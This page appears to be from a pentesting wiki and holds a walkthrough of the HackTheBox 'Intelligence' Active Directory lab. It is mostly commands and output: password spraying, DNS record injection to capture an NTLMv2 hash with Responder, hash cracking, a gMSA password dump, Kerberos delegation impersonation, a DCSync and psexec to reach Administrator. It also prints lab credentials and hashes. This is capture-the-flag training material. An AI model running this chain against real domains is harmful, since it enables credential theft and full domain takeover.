Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page

Was this helpful?

Last updated 2 years ago

Was this helpful?

Autorecon

Password: PentestEverything

BloodHound

Nmap

Add "10.10.10.248 intelligence.htb" to /etc/hosts.

Starting out on port 80 we come to the root page for Intelligence.

Running feroxbuster against the host revelas few results.

We see that further down the main page we have an opportunity to download a PDF document. At a glance there is nothing special about the document.

However, pulling metadata from the PDF document reveals potentially interesting user information.

We can achieve this withe exiftool.

We can then put the username into a known user text file and checking if the name is valid with kerbrute.

Great, we have a valid username. However, I was unable to brute force this user account. We also know the the account does not have pre-authentication enabled...

Looking back at the original request for the PDF document we notice we are unable list the contents or browse to the /documents directory on port 80.

The URL request for the document download has potentially fuzzable areas in the file name. We can try fuzzing for other PDF documents in the date range of the file name.

Firstly, I started OWASP ZAP and requested the PDF document again. From here I selected the request and sent it to the fuzzer.

To ensure complete coverage I selected each individual numeral from the date and added individual payloads for numbers 0-9 using the Numberzz module.

Then executed the fuzzer, in total we send 10000 requests to the target. Once completed sorting the results by size shows which requests have PDF documents available.

Highlighting all the request with a response body larger than 1,245 bytes should represent everything of interest.

Once we highlight all the request of interest we can right click to open the contextual menu and "Copy URLs to clipboard" and paste the results into a text file.

With a list of URLs we can run xargs with curl to download from each URL.

We can then run exiftool against all PDF's and extract the creator names into a known users file.

Checking against kerbrute for pre-authentication we do not get any positive hits. We do at least confirm the existence of users so far.

From here I tried brute forcing the username list for quite some time, utilizing various common password lists and could not get a single hit over any of the available protocols.

Digging deeper into our results I looked into parsing all the PDF documents for interesting information.

I researched the best way to parse PDF documents recursively for information and came across pdfgrep.

Install

Using the following command and specified pattern we identify something of interest.

Opening the file 2020-06-04-upload.pdf show us a potential password.

Password

We can spray this password with crackmapexec against SMB with our user list.

Where we the following valid credentials:

I was unable to utilize the user credentials to gain shell on the target system. We can however, use Bloodhound.py for external information gathering.

Looking at the Bloodhound results we have found a path for performing privilege escalation. First we need to try and get access to either Ted's or Laura's AD accounts.

Back to our tiffany user we look at SMB. We see we have read access to the IT Share.

Inside the IT share we find a PowerShell script which can be downloaded. The contents of which has been shown below:

Looking at the script it looks like a list of DNS records is fetched from LDAP and any records with name like "web" are then used in an Invoke-WebRequest to test if alive. The parameter -- -UseDefaultCredentials runs the script in the context of the user. Hopefully this will be Ted going by the Send-MailMessage parameters.

We can probably use Responder to try and catch a NTLM hash here. First we need a way for a new DNS record to point back to us.

dnstool.py can be used to add a new DNS record into into the target domain. The command below adds a new DNS record starting with "web" to trigger the PowerShell script that runs every 5 minutes.

Github: https://github.com/dirkjanm/krbrelayx.git

We can confirm the DNS record has been added by using ldapsearcher with tiffany's credentials.

Then we can start Responder (with default responder.conf file). After around five minutes we should catch an NTLMv2 hash where the PowerShell script is triggered and points back to our attacking machine.

NTLMv2 hash

We can then crack password with hashcat against the rockyou.txt password list.

We now have the following credentials

Now that we have access to Ted's account we can refer back to the Bloodhound attack path identified earlier on.

GMSA or Group Managed Serivce Accounts **** offer a more automated and secure way to manage service accounts. Stealthbits have a great blog post on what they are and how they are implimented linked below.

gMSADUmper is a python script that can be utilized to read the msDS-ManagedPassword **** attribute and decrypt with the msDS-ManagedPasswordID attribute.

Credentials

From the BloodHound results earlier we see svc_int has delegate access to the domain controller.

Now with the svc_int account hash we can then use Impacket's getST.py to retrieve a service ticket for the service we have delegate rights to "www" and impersonate another user "administrator".

When performing this impersonating method we also get access to any services that are accessible to the impersponated account. Impersonating the administrator account gives us the ability to access services such as LDAP (DCsync Attack) or HOST (Psexec.py).

Then run the following command to set the kerberos ticket use with Impacket.

Secretsdump.py can be used to then perform a DCsync attack and dump hashes.

Psexec.py can also be used for direct system access as the administrator account.

Github:

gMSADumper:

  1. 🚩Writeups
  2. HackTheBox
  3. Active Directory

Intelligence

https://app.hackthebox.com/machines/Intelligence

 feroxbuster -u http://10.10.10.248 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 
exiftool 2020-01-01-upload.pdf
kerbrute userenum users.txt -d intelligence.htb --dc 10.10.10.248
http://10.10.10.248/documents/2020-01-01-upload.pdf
xargs -n 1 curl -O < "URLs.txt" 
exiftool -r *.pdf | grep Creator | sed 's/Creator                         : //' | sort | uniq > KnownUsers.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
sudo apt install pdfgrep
pdfgrep  pass -r .
NewIntelligenceCorpUser9876
crackmapexec smb '10.10.10.248' -u 'users.txt' -p 'NewIntelligenceCorpUser9876'
Tiffany.Molina:NewIntelligenceCorpUser9876
sudo python2 bloodhound.py -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -c All -d intelligence.htb -gc dc.intelligence.htb -ns 10.10.10.248 --dns-timeout 20 --zip
smbmap -u 'tiffany.molina' -p 'NewIntelligenceCorpUser9876' -H 10.10.10.248 
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
sudo python3 dnstool.py -u intelligence.htb\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r Webfake.intelligence.htb -a add -d 10.10.14.14 10.10.10.248 
ldapsearch -x -h 10.10.10.248 -D 'CN=Tiffany Molina,CN=Users,DC=intelligence,DC=htb' -w 'NewIntelligenceCorpUser9876' -b "DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | grep Web 
sudo python2 Responder.py -I tun0 -A
Ted.Graves::intelligence:442c947175c3a3b7:137066EA5B18D803A78BEF442908364D:0101000000000000CC66ACA71E3AD80150504B3119CD58940000000002000800530034005100460001001E00570049004E002D004E004B003300480031004F0035004F004B00430056000400140053003400510046002E004C004F00430041004C0003003400570049004E002D004E004B003300480031004F0035004F004B00430056002E0053003400510046002E004C004F00430041004C000500140053003400510046002E004C004F00430041004C0008003000300000000000000000000000002000003D77F8C6CE9B70C505FB3580F608ED4749CDEC71C40CC8AB5EEBC6575A2F6FDD0A0010000000000000000000000000000000000009003A0048005400540050002F00770065006200660061006B0065002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
hashcat -m 5600 hash.hash /usr/share/wordlists/rockyou.txt
Ted.Graves:Mr.Teddy
python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248
svc_int:a5fd76c71109b0b483abe309fbc92ccb
getST.py intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb -spn WWW/dc.intelligence.htb -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass dc.intelligence.htb
psexec.py -k -no-pass dc.intelligence.htb
  • Autorecon
  • BloodHound
  • Nmap
https://github.com/fox-it/BloodHound.py
https://stealthbits.com/blog/what-are-group-managed-service-accounts-gmsa/
https://stealthbits.com/blog/securing-gmsa-passwords/
https://github.com/micahvandeusen/gMSADumper
nmap 10.10.10.248 -p- -sS -sV                                                                                                                                    

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-16 03:37:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
59877/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
206KB
Autorecon - 10.10.10.248.7z
archive
215KB
Bloodhound - 10.10.10.248.zip
archive
http://10.10.10.248/